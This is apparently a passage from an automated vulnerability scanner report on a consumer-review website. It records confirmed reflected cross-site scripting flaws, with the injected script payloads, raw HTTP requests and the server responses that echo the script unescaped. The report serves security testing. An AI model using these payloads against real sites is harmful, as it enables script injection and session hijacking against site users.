value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_college"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20..
- /online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CA)%3C/script%3E

/online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0002CA)</script>

Request

GET /online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CA)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_dating/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6980
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online dating, internet dating, matchmaking, dating site, Match.com, Chemistry.com, eHarmony, PerfectMatch.com, FriendFinder, Lavalife, Date.com, SpeedDate" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_dating/'"--></style></script><script>netsparker(0x0002CA)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002CA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_dating_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Dating Site Reviews & Ratings FAQ</h1> <p>Frequently Asked Questions about Online Dating Site Reviews & Ratings</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Dating Site Reviews & Ratings:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_dating"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-..
- /online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CC)%3C/script%3E

/online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CC)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enets..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0002CC)</script>

Request

GET /online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CC)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_dating/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6996
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online dating, internet dating, matchmaking, dating site, Match.com, Chemistry.com, eHarmony, PerfectMatch.com, FriendFinder, Lavalife, Date.com, SpeedDate" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_dating/index.php'"--></style></script><script>netsparker(0x0002CC)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002CC)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_dating_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Dating Site Reviews & Ratings FAQ</h1> <p>Frequently Asked Questions about Online Dating Site Reviews & Ratings</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Dating Site Reviews & Ratings:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_dating"> <input type="hidden" name="FieldData4" 